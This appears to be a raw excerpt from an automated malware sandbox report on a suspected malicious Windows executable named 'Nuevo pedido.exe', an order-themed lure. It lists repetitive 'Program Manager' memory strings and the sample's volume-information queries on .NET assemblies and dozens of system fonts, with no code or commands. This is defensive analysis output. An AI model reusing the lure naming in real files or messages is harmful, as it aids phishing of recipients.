Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhm
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhTA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDnG
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|\|W
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhv&
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4*/
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|Y;
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4jk
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTJ*
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|{
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@B2
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\9@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(t;
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHe
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,:W
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`b-
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP Q
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|XO
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8RZ
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\8T
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTHcq0
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@cY
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD:
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,;C
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhrj
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL}#
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q "T
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp@q
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh2.
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL{\
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP!=
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx/b
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdIS
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q E%
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4KV
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q #@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH1e
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@e
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|Xt
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdJ?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH7D
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q I=
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHWb
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\`F
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdW
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtp@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTOG
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q40'
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,a@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qToe
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPha
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@hq
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXz)
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0'\
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhw]
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql?#
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDr1
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd:
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<A&
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$1,
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$QJ
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdOA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$qh
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`'
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdOD
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP&o
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdp
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,B+
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTPP
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,bI
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhyR
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX6m
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`Gl
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdOp
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8Z.

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Users\user\Desktop\Nuevo pedido.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
